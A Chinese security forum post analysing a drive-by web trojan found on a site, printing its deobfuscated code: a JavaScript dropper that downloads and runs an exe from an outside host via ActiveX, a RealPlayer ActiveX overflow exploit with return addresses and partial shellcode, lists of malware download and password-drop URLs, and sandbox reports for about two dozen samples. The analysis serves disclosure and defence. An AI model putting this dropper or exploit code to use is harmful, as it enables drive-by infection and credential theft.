千里寻马挖掘送样本

Ruin · 发表于 2012-6-15 00:07

一个网马~ 开始动手猜解...
网址: www.????.com
进去后发现马
hXXP://www.foafau.info/m16.htm

<HTML>
<iframe src="88/881.htm" width="20" height="0" frameborder="0"></iframe>
<iframe src="88/883.htm" width="1" height="1" frameborder="0"></iframe>
</HTML>
<script language="javascript" type="text/javascript" src="hXXp://js.users.51.la/1358998.js"></script>

www . foafau.info/88/881.htm 解
<script>
document.writeln("<script>");
document.writeln("function gn(rRaGEykU1)");
document.writeln("{");
document.writeln("var Orh2=window[\"Math\"][\"random\"]()*rRaGEykU1;");
document.writeln("return\'~tmp\'+\'.tmp\'");
document.writeln("}");
document.writeln("try");
document.writeln("{");
document.writeln("var Cuteq qzf,Cuteq qzfs,Cuteq qzfx;");
document.writeln("Cuteq q=\'http:\/\/www.68yu.cn\/68down.exe\';");
document.writeln("Q q784378237=\'C:\\\\MicroSoft.pif\';");
document.writeln("Cuteq q784378237=\'C:\\\\MicroSoft.vbs\';");
document.writeln("Cuteq qzf=\"Set Cuteq qcn = CreateObject(\\\"Wscript.Shell\\\")\" + \"\\n\";");
document.writeln("Cuteq qzfs=\"Cuteq qcn.run \\\"cmd \/c C:\\\\MicroSoft.bat\\\",vbhide\";");
document.writeln("Cuteq qzfx=Cuteq qzf+Cuteq qzfs;");
document.writeln("var chilam=window[\"document\"][\"createElement\"](\"object\");");
document.writeln("chilam[\"setAttribute\"](\"classid\",\"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\");");
document.writeln("Cuteq qcn=gn(10000);");
document.writeln("var hHf$R6=chilam[\"CreateObject\"](\"Scripting.FileSystemObject\",\"\");");
document.writeln("var Cuteq q2=chilam[\"CreateObject\"](\"Microsoft.X\"+\"M\"+\"L\"+\"H\"+\"T\"+\"T\"+\"P\",\"\");");
document.writeln("var Cuteq q3=chilam[\"CreateObject\"](\"Adodb.Stream\",\"\");");
document.writeln("Cuteq q3[\"type\"]=1;");
document.writeln("var VgDnZXHt7=hHf$R6[\"GetSpecialFolder\"](0);");
document.writeln("Cuteq qcn=hHf$R6[\"BuildPath\"](VgDnZXHt7,Cuteq qcn);");
document.writeln("var SmAcqIwGV8=chilam[\"CreateObject\"](\"Shell.Application\",\"\");");
document.writeln("exp1=hHf$R6[\"BuildPath\"](VgDnZXHt7+\'\\\\system32\',\'cmd.exe\');");
document.writeln("SmAcqIwGV8[\"SHeLlExECuTe\"](exp1,\' \/c echo cmd.exe \/c C:\\\\MicroSoft.pif >C:\\\\MicroSoft.bat\',\"\",\"open\",0);");
document.writeln("Cuteq q2[\"open\"](\"GET\",Cuteq q,0);");
document.writeln("Cuteq q2[\"send\"]();");
document.writeln("Cuteq q3[\"Open\"]();");
document.writeln("Cuteq q3[\"Write\"](Cuteq q2[\"responseBody\"]);");
document.writeln("Cuteq q3[\"SaveToFile\"](q q784378237,2);");
document.writeln("Cuteq q3[\"Close\"]();");
document.writeln("Cuteq q3[\"type\"]=2;");
document.writeln("Cuteq q3[\"Open\"]();");
document.writeln("Cuteq q3[\"WriteText\"]=Cuteq qzfx;");
document.writeln("Cuteq q3[\"Savetofile\"](Cuteq q784378237,2);");
document.writeln("Cuteq q3[\"Close\"]();");
document.writeln("SmAcqIwGV8[\"SHeLlExECuTe\"](exp1,\' \/c \'+Cuteq q784378237,\"\",\"open\",0)");
document.writeln("}");
document.writeln("catch(i)");
document.writeln("{i=1}");
document.writeln("<\/script>");
document.writeln("<script type=\"text\/jscript\">function init() { document.write(\"\");}window.onload = init;<\/script>");
document.writeln("<body oncontextmenu=\"return false\" onselectstart=\"return false\" ondragstart=\"return false\">");
document.writeln("<\/PRE><\/BODY>");
document.writeln("");
</script>

hxxp://www. foafau.info/88/883.htm 解

<sCrIpT lAnGuAgE="jAvAsCrIpT">
eval("\146\165\156\143\164\151\157\156\40\122\145\141\154\105\170\160\154\............")
</script>

再解开

function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
if(user.indexOf("nt 5.")==-1)
return;
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Real = new ActiveXObject(VulObject);
}catch(error)
{
return;
}
RealVersion = Real.PlayerProperty("PRODUCTVERSION");
Padding = "";
JmpOver = unescape("%75%06%74%04");
for(i=0;i<32*148;i++)
Padding += "S";
if(RealVersion.indexOf("6.0.14.") == -1)
{
if(navigator.userLanguage.toLowerCase() == "zh-cn")
ret = unescape("%7f%a5%60");
else if(navigator.userLanguage.toLowerCase() == "en-us")
ret = unescape("%4f%71%a4%60");
else
return;
}
else if(RealVersion == "6.0.14.544")
ret = unescape("%63%11%08%60");
else if(RealVersion == "6.0.14.550")
ret = unescape("%63%11%04%60");
else if(RealVersion == "6.0.14.552")
ret = unescape("%79%31%01%60");
else if(RealVersion == "6.0.14.543")
ret = unescape("%79%31%09%60");
else if(RealVersion == "6.0.14.536")
ret = unescape("%51%11%70%63");
else
return;
if(RealVersion.indexOf("6.0.10.") != -1)
{
for(i=0;i<4;i++)
Padding = Padding + JmpOver;
Padding = Padding + ret;
}
else if(RealVersion.indexOf("6.0.11.") != -1)
{
for(i=0;i<6;i++)
Padding = Padding + JmpOver;
Padding = Padding + ret;
}
else if(RealVersion.indexOf("6.0.12.") != -1)
{
for(i=0;i<9;i++)
Padding = Padding + JmpOver;
Padding = Padding + ret;
}
else if(RealVersion.indexOf("6.0.14.") != -1)
{
for(i=0;i<10;i++)
Padding = Padding + JmpOver;
Padding = Padding + ret;
}
AdjESP = "LLLL\\XXXXXLD";
Shell ="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBA.....";
PayLoad = Padding + AdjESP + Shell;
while(PayLoad.length < 0x8000)
PayLoad += "ChuiZi";
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
RealExploit();

结论:

利用 RealPlayer 的 Exploit 网马

Worm.Win32.Downloader.cg (下载者)
位置 : hxxp://www.68yu.cn/68down.exe

从发现的下载者中又继续挖

这些木马中有一个是21.exe 是机器狗

自动下载
hxxp://www.68yu.cn/1.exe
hxxp://www.68yu.cn/2.exe
hxxp://www.68yu.cn/3.exe
hxxp://www.68yu.cn/4.exe
hxxp://www.68yu.cn/5.exe
hxxp://www.68yu.cn/6.exe
hxxp://www.68yu.cn/7.exe
hxxp://www.68yu.cn/8.exe
hxxp://www.68yu.cn/9.exe
hxxp://www.68yu.cn/10.exe
hxxp://www.68yu.cn/11.exe
hxxp://www.68yu.cn/12.exe
hxxp://www.68yu.cn/13.exe
hxxp://www.68yu.cn/14.exe
hxxp://www.68yu.cn/15.exe
hxxp://www.68yu.cn/16.exe
hxxp://www.68yu.cn/17.exe
hxxp://www.68yu.cn/18.exe
hxxp://www.68yu.cn/19.exe
hxxp://www.68yu.cn/20.exe
hxxp://www.68yu.cn/21.exe
hxxp://www.68yu.cn/22.exe
hxxp://www.68yu.cn/23.exe
hxxp://www.68yu.cn/24.exe
hxxp://www.68yu.cn/25.exe

真是大豐收.....

在从下载者中抓回来的在分析....

密码提交位置

hxxp://www.pk5173.cn/game/xb/xxx.asp
hxxp://www.redtaobao.com/mh777/post.asp
hxxp://www.jmfast.cn/shijian/tempes/post.asp
hxxp://222.186.191.13/daojian/ceqrc6/post.asp
hxxp://onlinewg.cn/xiaobao/a789666a.asp
hxxp://www.pk5173.cn/game/xb/xxx.asp

1.exe
[ General_Information]
Accesses executable file from resource section.
Drops files in %WINSYS% folder.
Creating several executable files on hard-drive.
File length: 15360 bytes.
MD5 hash: c722b0da7fa9a5172bbfcf590e81b942.

[ Changes_to_filesystem ]
Creates file C:\WINDOWS\TEMP\LYLOADER.EXE.
Deletes file c:\sample.exe.
Creates file C:\Privilege.dat.
Creates file C:\WINDOWS\SYSTEM32\LYLOADER.EXE.
Deletes file C:\Privilege.dat.
Creates file C:\WINDOWS\TEMP\LYMANGR.DLL.
Creates file C:\WINDOWS\SYSTEM32\LYMANGR.DLL.
Creates file C:\WINDOWS\TEMP\MSDEG32.DLL.
Creates file C:\WINDOWS\SYSTEM32\MSDEG32.DLL.
Creates file C:\WINDOWS\SYSTEM32\REGKEY.hiv.
Deletes file C:\WINDOWS\SYSTEM32\REGKEY.hiv.

[ Network_Services ]
Connects to "222.169.224.183" on port 3128 (IP).
Connects to "222.169.224.183" on port 8080 (IP).

[ Process-window information ]
Creates process "C:\WINDOWS\TEMP\LYLOADER.EXE".
Checks if privilege "SeRestorePrivilege" is available.
Enumerates running processes.
Modifies other process memory.
Creates a remote thread.
Will inject library C:\WINDOWS\SYSTEM32\LYMANGR.DLL into remote processes.
Enumerates running processes several parses....

10.exe
[ General_Information]
**Locates window "NULL [class AVP.AlertDialog]" on desktop.
**Locates window "NULL [class AVP.Product_Notification]" on desktop.
**Locates window "瑞星注册表监控提示 [class NULL]" on desktop.

[ Process-window information ]
Creates an event called 32718848.

11.exe
[ General_Information]
File might be compressed.
Decompressing ASPack.
Accesses executable file from resource section.
Creating several executable files on hard-drive.
File length: 42289 bytes.
MD5 hash: 7ca51ccaa6dcafd5325074843e5bd400.

[ Changes_to_filesystem ]
Deletes file \abc.nmp.
Deletes file C:\WINDOWS\abcddddddddddddd.nmp.
Deletes file C:\WINDOWS\abc.nmp.
Creates file C:\WINDOWS\418429M.exe.
Creates file C:\WINDOWS\418429MM.DLL.

[ Changes to registry ]
Creates value "WinSysM"="C:\WINDOWS\418429M.exe" in key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run".

[ Process-window information ]
Attemps to open C:\WINDOWS\418429M.exe NULL.
Creates process "C:\WINDOWS\418429M.exe".
Attemps to Open C:\COMMAND.COM NULL.
Will automatically restart after boot (I'll be back...).
Checks if privilege "SeDebugPrivilege" is available.
Enumerates running processes.
Modifies other process memory.
Creates a remote thread.
Will inject library C into remote processes.
Enumerates running processes several parses....

12.exe
[ General_Information]
Decompressing UPX.
Accesses executable file from resource section.
**Locates window "NaleN_bsazideq [class NULL]" on desktop.
**Locates window "Joaa_rniJaomuq [class NULL]" on desktop.
File length: 30329 bytes.
MD5 hash: 70dc46fa0897e2383c75e319787e154b.

[ Changes_to_filesystem ]
Deletes file C:\Program Files\Internet Explorer\PLUGINS\NvWin_5.Jmp.
Creates file C:\Program Files\Internet Explorer\PLUGINS\NvWin_5.Jmp.
Deletes file C:\Program Files\Internet Explorer\PLUGINS\NvSys_55.Sys.
Creates file C:\Program Files\Internet Explorer\PLUGINS\NvSys_55.Sys.

[ Changes to registry ]
Creates key "HKCR\CLSID\{471B15AD-7A9C-491D-9C19-4E15B12DCE00}".
Sets value ""="" in key "HKCR\CLSID\{471B15AD-7A9C-491D-9C19-4E15B12DCE00}".
Creates key "HKCR\CLSID\{471B15AD-7A9C-491D-9C19-4E15B12DCE00}\InProcServer32".
Sets value ""="C:\Program Files\Internet Explorer\PLUGINS\NvSys_55.Sys" in key "HKCR\CLSID\{471B15AD-7A9C-491D-9C19-4E15B12DCE00}\InProcServer32".
Sets value "ThreadingModel"="Apartment" in key "HKCR\CLSID\{471B15AD-7A9C-491D-9C19-4E15B12DCE00}\InProcServer32".
Creates key "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{471B15AD-7A9C-491D-9C19-4E15B12DCE00}".
Creates value "{471B15AD-7A9C-491D-9C19-4E15B12DCE00}"="" in key "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks".

[ Network ]
Hooks into Shell explorer.

[ Process-window information ]
Creates process ""c:\sample.exe"".

13.exe
[ General_Information]
File might be compressed.
Decompressing Unk3!FSG?.
**Locates window "HM_MESSWOWAGEWFTCDLL [class HM_MESSWOWFTCDLL]" on desktop.
Accesses executable file from resource section.
Drops files in %WINSYS% folder.
**Locates window "NULL [class GxWindowClassD3d]" on desktop.
File length: 33389 bytes.
MD5 hash: b651ccc0006c5f204f2eeadec825f825.

[ Changes_to_filesystem ]
Deletes file C:\WINDOWS\SYSTEM32\osygwemudm.dll.
Creates file C:\WINDOWS\SYSTEM32\osygwemudm.dll.
Creates file C:\WINDOWS\SYSTEM32\FTCCompress.dll.
Deletes file c:\sample.exe.

[ Changes to system settings ]
Creates Windows_Hook_monitoring_messages_activity.

[ Process-window information ]
Creates process "C:\WINDOWS\SYSTEM32\FTCCompress.dll".
Enumerates running processes.

14.exe
[ General_Information]
Accesses executable file from resource section.
Drops files in %WINSYS% folder.
File length: 14562 bytes.
MD5 hash: de58eb5494f1a11a74f47b36c1b8738b.

[ Changes_to_filesystem ]
Creates file C:\WINDOWS\Fonts\cadaafx.fon.
Deletes file C:\WINDOWS\SYSTEM32\sidjezy.dll.
Creates file C:\WINDOWS\SYSTEM32\sidjezy.dll.
Deletes file C:\WINDOWS\SYSTEM32\sidjeaz.exe.
Creates file C:\WINDOWS\SYSTEM32\sidjeaz.exe.
Deletes file C:\DFD267791.bat.
Creates file C:\DFD267791.bat.
Deletes file C:\DFD739433.bat.
Creates file C:\DFD739433.bat.

[ Changes to registry ]
Creates key "HKCR\CLSID\{58847374-8323-FADC-B443-4732ABCD3785}\InprocServer32".
Sets value ""="C:\WINDOWS\SYSTEM32\sidjezy.dll" in key "HKCR\CLSID\{58847374-8323-FADC-B443-4732ABCD3785}\InprocServer32".
Sets value "ThreadingModel"="Apartment" in key "HKCR\CLSID\{58847374-8323-FADC-B443-4732ABCD3785}\InprocServer32".
Creates value "{58847374-8323-FADC-B443-4732ABCD3785}"="sidjezy.dll" in key "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks".

[ Changes to system settings ]
Modifies profile key "Url1"="15E3FFFFFBB1A4A4B9B9B9A5BAB3BDA5BAB2BAA5BAB8A4EFEAE4E1E2EAE5A4E8EEFAF9E8BDA4FBE4F8FFA5EAF8FB" in section [Send] of file C:\WINDOWS\Fonts\cadaafx.fon.
Modifies profile key "Url1"="hxxp://222.186.191.13/daojian/ceqrc6/post.asp" in section [Send] of file C:\WINDOWS\Fonts\sidjecs.dll.
Creates Windows_Hook_monitoring _keyboard activity.
Creates Windows_Hook_monitoring _mouse activity.

[ Network ]
Hooks into Shell explorer.

[ Process-window information ]
Enumerates running processes.
Creates process "C:\WINDOWS\SYSTEM32\sidjeaz.exe".

15.exe
[ General_Information]
Accesses executable file from resource section.
Drops files in %WINSYS% folder.
File length: 16384 bytes.
MD5 hash: 2aa9e120eb9aa70b4fd4cda2d08238c2.

[ Changes_to_filesystem ]
Creates file C:\WINDOWS\Fonts\msguasd.fon.
Deletes file C:\WINDOWS\SYSTEM32\avwghmn.dll.
Creates file C:\WINDOWS\SYSTEM32\avwghmn.dll.
Deletes file C:\WINDOWS\SYSTEM32\avwghst.exe.
Creates file C:\WINDOWS\SYSTEM32\avwghst.exe.
Deletes file C:\DFD291178.bat.
Creates file C:\DFD291178.bat.
Deletes file C:\DFD833069.bat.
Creates file C:\DFD833069.bat.

[ Changes to registry ]
Creates key "HKCR\CLSID\{8A1247C1-53DA-FF43-ABD3-345F323A48D8}\InprocServer32".
Sets value ""="C:\WINDOWS\SYSTEM32\avwghmn.dll" in key "HKCR\CLSID\{8A1247C1-53DA-FF43-ABD3-345F323A48D8}\InprocServer32".
Sets value "ThreadingModel"="Apartment" in key "HKCR\CLSID\{8A1247C1-53DA-FF43-ABD3-345F323A48D8}\InprocServer32".
Creates value "{8A1247C1-53DA-FF43-ABD3-345F323A48D8}"="avwghmn.dll" in key "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks".

[ Changes to system settings ]
Modifies profile key "Url1"="BF495555511B0E0E5656560F4B4C474052550F424F0E5249484B48404F0E55444C5144520E514E52550F405251" in section [Send] of file C:\WINDOWS\Fonts\msguasd.fon.
Modifies profile key "Url1"="hxxp://www.jmfast.cn/shijian/tempes/post.asp" in section [Send] of file C:\WINDOWS\Fonts\avwghin.dll.
Creates Windows_Hook_monitoring _keyboard activity.
Creates Windows_Hook_monitoring _mouse activity.
Modifies profile key "Url1"="B94F5353571D0808505050094D4A4146545309444908544F4E4D4E46490853424A574254085748545309465457" in section [Send] of file C:\WINDOWS\Fonts\msguasd.fon.
Modifies profile key "Url2"="A25448484C0613134B4B4B1256515A5D4F48125F52134F545556555D52134859514C594F134C534F48125D4F4C" in section [Send] of file C:\WINDOWS\Fonts\msguasd.fon.

[ Network ]
Hooks into Shell explorer.

[ Process-window information ]
Enumerates running processes.
Creates process "C:\WINDOWS\SYSTEM32\avwghst.exe".

16.exe
[ General_Information]
Accesses executable file from resource section.
Drops files in %WINSYS% folder.
File length: 16594 bytes.
MD5 hash: ed9653148863cd28ff3acdadcfdf10e1.

[ Changes_to_filesystem ]
Creates file C:\WINDOWS\Fonts\mszhasd.fon.
Deletes file C:\WINDOWS\SYSTEM32\avzxkmn.dll.
Creates file C:\WINDOWS\SYSTEM32\avzxkmn.dll.
Deletes file C:\WINDOWS\SYSTEM32\avzxkst.exe.
Creates file C:\WINDOWS\SYSTEM32\avzxkst.exe.
Deletes file C:\DFD285250.bat.
Creates file C:\DFD285250.bat.
Deletes file C:\DFD839870.bat.
Creates file C:\DFD839870.bat.

[ Changes to registry ]
Creates key "HKCR\CLSID\{B859245F-345D-BC13-AC4F-145D47DA34FB}\InprocServer32".
Sets value ""="C:\WINDOWS\SYSTEM32\avzxkmn.dll" in key "HKCR\CLSID\{B859245F-345D-BC13-AC4F-145D47DA34FB}\InprocServer32".
Sets value "ThreadingModel"="Apartment" in key "HKCR\CLSID\{B859245F-345D-BC13-AC4F-145D47DA34FB}\InprocServer32".
Creates value "{B859245F-345D-BC13-AC4F-145D47DA34FB}"="avzxkmn.dll" in key "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks".

[ Changes to system settings ]
Modifies profile key "Url1"="B24458585C1603035B5B5B025E4948584D434E4D43024F43410341441B1B1B035C435F58024D5F5C" in section [Send] of file C:\WINDOWS\Fonts\mszhasd.fon.
Modifies profile key "Url1"="hxxp://www.redtaobao.com/mh777/post.asp" in section [Send] of file C:\WINDOWS\Fonts\avzxkin.dll.
Creates Windows_Hook_monitoring _keyboard activity.
Creates Windows_Hook_monitoring _mouse activity.
Modifies profile key "Url1"="07F1EDEDE9A3B6B6EEEEEEB7EBFCFDEDF8F6FBF8F6B7FAF6F4B6F4F1AEAEAEB6E9F6EAEDB7F8EAE9" in section [Send] of file C:\WINDOWS\Fonts\mszhasd.fon.
Modifies profile key "Url2"="D7213D3D397366663E3E3E673B2C2D3D28262B2826672A26246624217E7E7E6639263A3D67283A39" in section [Send] of file C:\WINDOWS\Fonts\mszhasd.fon.

[ Network ]
Hooks into Shell explorer.

[ Process-window information ]
Enumerates running processes.
Creates process "C:\WINDOWS\SYSTEM32\avzxkst.exe".

17.exe
[ General_Information]
Accesses executable file from resource section.
Drops files in %WINSYS% folder.
File length: 17092 bytes.
MD5 hash: 6059a150ce6153ffd2584cf0a7a76271.

[ Changes_to_filesystem ]
Deletes file C:\WINDOWS\SYSTEM32\HookHelp.sys.
Deletes file C:\WINDOWS\SYSTEM32\DRIVERS\comint32.sys.
Creates file C:\WINDOWS\SYSTEM32\gdwli32.cfg.
Deletes file C:\WINDOWS\SYSTEM32\gdwli32.dll.
Creates file C:\WINDOWS\TEMP\tmp0199.tmp.
Deletes file C:\WINDOWS\TEMP\tmp0199.tmp.
Creates file C:\WINDOWS\SYSTEM32\gdwli32.dll.
Creates file C:\WINDOWS\TEMP\tmp8119.tmp.
Deletes file C:\WINDOWS\TEMP\tmp8119.tmp.
Creates file C:\WINDOWS\SYSTEM32\DRIVERS\comint32.sys.

[ Changes to registry ]
Creates key "HKLM\System\CurrentControlSet\Services\AsyncMac".
Creates key "HKLM\System\CurrentControlSet\Services\comint32".
Sets value "ImagePath"="C:\WINDOWS\SYSTEM32\DRIVERS\comint32.sys" in key "HKLM\System\CurrentControlSet\Services\comint32".
Sets value "DisplayName"="comint32" in key "HKLM\System\CurrentControlSet\Services\comint32".

[ Process-window information ]
Enumerates running processes.
Attempts to access service "comint32".
Creates service "comint32 (comint32)" as "C:\WINDOWS\SYSTEM32\DRIVERS\comint32.sys".
Creates a mutex __B_WL.

18.exe
[ General_Information]
File might be compressed.
Decompressing ASPack.
Drops files in %WINSYS% folder.
Accesses executable file from resource section.
Creating several executable files on hard-drive.
File length: 52529 bytes.
MD5 hash: b40effc6a00ca92dd93af804974b0084.

[ Changes_to_filesystem ]
Creates file C:\WINDOWS\SYSTEM32\map\88X600.nmp.
Creates file C:\WINDOWS\418429L.exe.
Creates file C:\WINDOWS\418429WL.DLL.

[ Changes to registry ]
Creates value "WinSysW"="C:\WINDOWS\418429L.exe" in key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run".

[ Process-window information ]
Attemps to open C:\WINDOWS\418429L.exe NULL.
Creates process "C:\WINDOWS\418429L.exe".
Attemps to Open C:\COMMAND.COM NULL.
Will automatically restart after boot (I'll be back...).
Checks if privilege "SeDebugPrivilege" is available.
Enumerates running processes.
Modifies other process memory.
Creates a remote thread.
Will inject library C into remote processes.
Enumerates running processes several parses....

19.exe
[ General_Information]
File might be compressed.
Decompressing Unk3!FSG?.
Accesses executable file from resource section.
Drops files in %WINSYS% folder.
Creating several executable files on hard-drive.
File length: 176813 bytes.
MD5 hash: db6bcdf0d382fbd9bfc42ba7cf3fc41e.

[ Changes_to_filesystem ]
Creates file C:\WINDOWS\SYSTEM32\Packet.dll.
Creates file C:\WINDOWS\SYSTEM32\WanPacket.dll.
Creates file C:\WINDOWS\SYSTEM32\wpcap.dll.
Creates file C:\WINDOWS\SYSTEM32\drivers\npf.sys.
Creates file C:\WINDOWS\SYSTEM32\drivers\svchost.exe.
Creates file C:\WINDOWS\SYSTEM32\drivers\scvhost.exe.
Deletes file C:\WINDOWS\SYSTEM32\drivers\scvhost.exe.

[ Changes to registry ]
Creates value "KVP"="C:\WINDOWS\SYSTEM32\drivers\svchost.exe" in key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run".

[ Process-window information ]
Will automatically restart after boot (I'll be back...).
Creates process "C:\WINDOWS\SYSTEM32\drivers\svchost.exe".
Attemps to open C:\WINDOWS\SYSTEM32\drivers\scvhost.exe -idx 0 -ip 192..
Creates process "C:\WINDOWS\SYSTEM32\drivers\scvhost.exe".

2.exe
[ General_Information]
Decompressing Upack?.
**Locates window "NULL [class AVP.AlertDialog]" on desktop.
**Locates window "NULL [class AVP.Product_Notification]" on desktop.
**Locates window "瑞星注册表监控提示 [class NULL]" on desktop.

[ Process-window information ]
Creates an event called 63925483.

20.exe
[ General_Information]
Decompressing UPX.
File length: 9216 bytes.
MD5 hash: 94b540447445a7acfb2ab2a408d4122f.

[ Network_Services ]
Downloads file from hxxp://sdo.969111.com/wm/hosts.txt as C:\WINDOWS\system32\drivers\etc\hosts.
Connects to "sdo.969111.com" on port 80 (TCP).
Opens URL: sdo.969111.com/wm/hosts.txt.

[ Spreading by infecting files ]
File infector; modifies existing executable files.

[ Security issues ]
Starting downloaded file - potential security problem.

[ Process-window information ]
Attemps to open C:\WINDOWS\system32\drivers\etc\hosts .
Creates process "C:\WINDOWS\system32\drivers\etc\hosts".

21.exe
[ General_Information]
Accesses executable file from resource section.
File length: 49152 bytes.
MD5 hash: c05bf1739ce5116b3d3b86888bf1892b.

[ Changes_to_filesystem ]
Creates file C:\WINDOWS\system32\drivers\pcihdd.sys.
Deletes file C:\WINDOWS\system32\drivers\pcihdd.sys.

[ Changes to registry ]
Creates key "HKLM\System\CurrentControlSet\Services\PciHdd".
Sets value "ImagePath"="C:\WINDOWS\system32\drivers\pcihdd.sys" in key "HKLM\System\CurrentControlSet\Services\PciHdd".
Sets value "DisplayName"="PciHdd" in key "HKLM\System\CurrentControlSet\Services\PciHdd".

[ Process-window information ]
Creates service "PciHdd (PciHdd)" as "C:\WINDOWS\system32\drivers\pcihdd.sys".
Attempts to access service "PciHdd".

22.exe
[ General_Information]
Accesses executable file from resource section.
Drops files in %WINSYS% folder.
File length: 14984 bytes.
MD5 hash: 44655f7eb9128362e3935b7986ec1bd8.

[ Changes_to_filesystem ]
Deletes file C:\WINDOWS\SYSTEM32\HookHelp.sys.
Deletes file C:\WINDOWS\SYSTEM32\DRIVERS\comint32.sys.
Creates file C:\WINDOWS\SYSTEM32\gdjzi32.cfg.
Deletes file C:\WINDOWS\SYSTEM32\gdjzi32.dll.
Creates file C:\WINDOWS\TEMP\tmp0199.tmp.
Deletes file C:\WINDOWS\TEMP\tmp0199.tmp.
Creates file C:\WINDOWS\SYSTEM32\gdjzi32.dll.
Creates file C:\WINDOWS\TEMP\tmp8119.tmp.
Deletes file C:\WINDOWS\TEMP\tmp8119.tmp.
Creates file C:\WINDOWS\SYSTEM32\DRIVERS\comint32.sys.

[ Changes to registry ]
Creates key "HKLM\System\CurrentControlSet\Services\AsyncMac".
Creates key "HKLM\System\CurrentControlSet\Services\comint32".
Sets value "ImagePath"="C:\WINDOWS\SYSTEM32\DRIVERS\comint32.sys" in key "HKLM\System\CurrentControlSet\Services\comint32".
Sets value "DisplayName"="comint32" in key "HKLM\System\CurrentControlSet\Services\comint32".

[ Process-window information ]
Attempts to access service "comint32".
Creates service "comint32 (comint32)" as "C:\WINDOWS\SYSTEM32\DRIVERS\comint32.sys".
Creates a mutex __B_JZ.

23.exe
[ General_Information]
Accesses executable file from resource section.
Drops files in %WINSYS% folder.
File length: 15932 bytes.
MD5 hash: 1b438f03c317030e49761ea84f70a958.

[ Changes_to_filesystem ]
Deletes file C:\WINDOWS\SYSTEM32\HookHelp.sys.
Deletes file C:\WINDOWS\SYSTEM32\DRIVERS\comint32.sys.
Creates file C:\WINDOWS\SYSTEM32\gdq qhxi32.cfg.
Deletes file C:\WINDOWS\SYSTEM32\gdq qhxi32.dll.
Creates file C:\WINDOWS\TEMP\tmp0199.tmp.
Deletes file C:\WINDOWS\TEMP\tmp0199.tmp.
Creates file C:\WINDOWS\SYSTEM32\gdq qhxi32.dll.
Creates file C:\WINDOWS\TEMP\tmp8119.tmp.
Deletes file C:\WINDOWS\TEMP\tmp8119.tmp.
Creates file C:\WINDOWS\SYSTEM32\DRIVERS\comint32.sys.

[ Changes to registry ]
Creates key "HKLM\System\CurrentControlSet\Services\AsyncMac".
Creates key "HKLM\System\CurrentControlSet\Services\comint32".
Sets value "ImagePath"="C:\WINDOWS\SYSTEM32\DRIVERS\comint32.sys" in key "HKLM\System\CurrentControlSet\Services\comint32".
Sets value "DisplayName"="comint32" in key "HKLM\System\CurrentControlSet\Services\comint32".

[ Process-window information ]
Enumerates running processes.
Attempts to access service "comint32".
Creates service "comint32 (comint32)" as "C:\WINDOWS\SYSTEM32\DRIVERS\comint32.sys".
Creates a mutex __B_q qHX.

24.exe
[ General_Information]
Accesses executable file from resource section.
Drops files in %WINSYS% folder.
File length: 15249 bytes.
MD5 hash: 1b59aebe79f0f374423b101145108235.

[ Changes_to_filesystem ]
Creates file C:\WINDOWS\Fonts\enpoafx.fon.
Deletes file C:\WINDOWS\SYSTEM32\kapjezy.dll.
Creates file C:\WINDOWS\SYSTEM32\kapjezy.dll.
Deletes file C:\WINDOWS\SYSTEM32\kapjeaz.exe.
Creates file C:\WINDOWS\SYSTEM32\kapjeaz.exe.
Deletes file C:\DFD285356.bat.
Creates file C:\DFD285356.bat.
Deletes file C:\DFD751581.bat.
Creates file C:\DFD751581.bat.

[ Changes to registry ]
Creates key "HKCR\CLSID\{5A321487-4977-D98A-C8D5-6488257545A5}\InprocServer32".
Sets value ""="C:\WINDOWS\SYSTEM32\kapjezy.dll" in key "HKCR\CLSID\{5A321487-4977-D98A-C8D5-6488257545A5}\InprocServer32".
Sets value "ThreadingModel"="Apartment" in key "HKCR\CLSID\{5A321487-4977-D98A-C8D5-6488257545A5}\InprocServer32".
Creates value "{5A321487-4977-D98A-C8D5-6488257545A5}"="kapjezy.dll" in key "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks".

[ Changes to system settings ]
Modifies profile key "Url1"="827468686C2633337372707572796B7B327F723364757D737E7D73337D2B24252A2A2A7D327D6F6C" in section [Send] of file C:\WINDOWS\Fonts\enpoafx.fon.
Modifies profile key "Url1"="hxxp://onlinewg.cn/xiaobao/a789666a.asp" in section [Send] of file C:\WINDOWS\Fonts\kapjecs.dll.
Creates Windows_Hook_monitoring _keyboard activity.
Creates Windows_Hook_monitoring _mouse activity.

[ Network ]
Hooks into Shell explorer.

[ Process-window information ]
Enumerates running processes.
Creates process "C:\WINDOWS\SYSTEM32\kapjeaz.exe".

25.exe
[ General_Information]
Accesses executable file from resource section.
Drops files in %WINSYS% folder.
File length: 15749 bytes.
MD5 hash: 5fa468788d5dd256b042bd44cb10da7a.

[ Changes_to_filesystem ]
Creates file C:\WINDOWS\Fonts\wijiafw.fon.
Deletes file C:\WINDOWS\SYSTEM32\swjqbzc.dll.
Creates file C:\WINDOWS\SYSTEM32\swjqbzc.dll.
Deletes file C:\WINDOWS\SYSTEM32\swjqbac.exe.
Creates file C:\WINDOWS\SYSTEM32\swjqbac.exe.
Deletes file C:\DFD284284.bat.
Creates file C:\DFD284284.bat.
Deletes file C:\DFD767853.bat.
Creates file C:\DFD767853.bat.

[ Changes to registry ]
Creates key "HKCR\CLSID\{24909874-8982-F344-A322-7898787FA742}\InprocServer32".
Sets value ""="C:\WINDOWS\SYSTEM32\swjqbzc.dll" in key "HKCR\CLSID\{24909874-8982-F344-A322-7898787FA742}\InprocServer32".
Sets value "ThreadingModel"="Apartment" in key "HKCR\CLSID\{24909874-8982-F344-A322-7898787FA742}\InprocServer32".
